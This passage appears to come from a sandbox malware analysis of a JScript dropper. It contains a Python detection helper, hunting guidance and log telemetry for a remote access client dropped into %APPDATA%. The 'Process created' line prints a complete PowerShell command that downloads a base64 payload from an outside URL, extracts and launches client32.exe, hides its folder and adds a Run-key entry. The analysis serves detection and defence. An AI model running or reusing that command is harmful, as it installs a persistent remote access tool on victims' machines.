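    m = re.search(r"New-ItemProperty\s+-Path\s+(\S+)\s+-Name\s+(\S+)\s+-Value\s+(\S+)", cmdline)
    if not m:
        return None
    def res(tok):
        return env.get(tok[1:], tok) if tok.startswith("$") else tok
    return {"key": res(m.group(1)), "name": res(m.group(2)), "value": res(m.group(3))}


def drop_dir_candidates(cmdline):
    """Enumerate every %APPDATA% folder name the script can create. Get-Random -Minimum a
    -Maximum b returns a <= n < b (Maximum is exclusive), so the set is small enough to
    hunt for by exact name rather than by wildcard."""
    m = re.search(r"GetFolderPath\('ApplicationData'\)\+'\\([^']+)'\+\$(\w+)", cmdline)
    if not m:
        return []
    prefix, var = m.groups()
    r = re.search(rf"\${var}\s*=\s*Get-Random\s+-Minimum\s+(-?\d+)\s+-Maximum\s+(-?\d+)", cmdline)
    if not r:
        return [prefix + "*"]
    return [f"{prefix}{n}" for n in range(int(r.group(1)), int(r.group(2)))]


def analyze(event):
    cmd = get_field(event, "CommandLine")
    return {
        "script_host_parent": script_host_parent(event),
        "behaviours": match_behaviours(cmd),
        "urls": urls(cmd),
        "run_key": persistence(cmd),
        "drop_dirs": drop_dir_candidates(cmd),
    }


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_EVENT), indent=2))
```

Because Get-Random -Maximum is exclusive, the drop folder is one of EQMIUFUUUCW-5 through EQMIUFUUUCW11 under %APPDATA%; the analysed run produced EQMIUFUUUCW3. Hunting for those exact folder names, for the DIWFE value under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and for powershell.exe children of wscript.exe covers the persistence this sample installs.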
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pcicl32.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pcichek.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pcicapi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: nsmtrace.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: nslsp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pcihooks.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: riched32.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: pciinv.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: firewallapi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: fwbase.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\NSM.ini
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Update.js Static file information: File size 4053374 > 1048576
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll
Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 0000000A.00000002.2533582731.000000006CCA1000.00000020.00000001.01000000.0000000C.sdmp, msvcr100.dll.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00BC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1567156116.0000026C00BBE000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538791982.00000000747F2000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C0059F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 0000000A.00000002.2489223815.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000A.00000000.1514998417.0000000000442000.00000002.00000001.01000000.00000008.sdmp, client32.exe.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000008.00000002.1567156116.0000026C00CEF000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.8.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000008.00000002.1567156116.0000026C00B9F000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2538169520.0000000073A85000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.8.dr

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Conta
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary, 10_2_11029BB0
Source: PCICL32.DLL.8.dr Static PE information: section name: .hhshare
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBB563BA push E85E4D00h; ret 8_2_00007FFECBB563C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBB5882B push FFFFFFCAh; retf 8_2_00007FFECBB5882D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBB5883B push FFFFFFCAh; retf 8_2_00007FFECBB5883D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBB5869B push FFFFFFCAh; retf 8_2_00007FFECBB5869D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBB586AB push FFFFFFCAh; retf 8_2_00007FFECBB586AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBB52610 pushad ; iretd 8_2_00007FFECBB6D242
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBDC474C push ds; retf 8_2_00007FFECBDC474F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE523B1 push FFFFFFCDh; retf 8_2_00007FFECBE523B3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE5278C push FFFFFFCDh; retf 8_2_00007FFECBE5278E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE5236B push FFFFFFCDh; retf 8_2_00007FFECBE5236D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE5131F push edx; iretd 8_2_00007FFECBE51321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE54B0A push edx; iretd 8_2_00007FFECBE54B0C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE5226E push FFFFFFCDh; retf 8_2_00007FFECBE52270
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE521BD push FFFFFFCDh; retf 8_2_00007FFECBE521EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE52589 push FFFFFFCDh; retf 8_2_00007FFECBE5258B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE5216B push FFFFFFCDh; retf 8_2_00007FFECBE5216D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBE524C2 push FFFFFFCDh; retf 8_2_00007FFECBE524C4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFA7937 push ebx; retf 8_2_00007FFECBFA793A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECBFA4D5F push eax; retf 8_2_00007FFECBFA4D79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECC4B0048 push eax; retf 8_2_00007FFECC4B0049
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFECC4B7D3E push esi; ret 8_2_00007FFECC4B7D67
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1116FF15 push ecx; ret 10_2_1116FF28
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1116AE09 push ecx; ret 10_2_1116AE1C
Source: msvcr100.dll.8.dr Static PE information: section name: .text entropy: 6.909044922675825
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\remcmdstub.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\TCCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\HTCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\PCICHEK.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\msvcr100.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\pcicapi.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_6CA97030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod, 10_2_6CA97030
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError, 10_2_11128B10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DIWFE
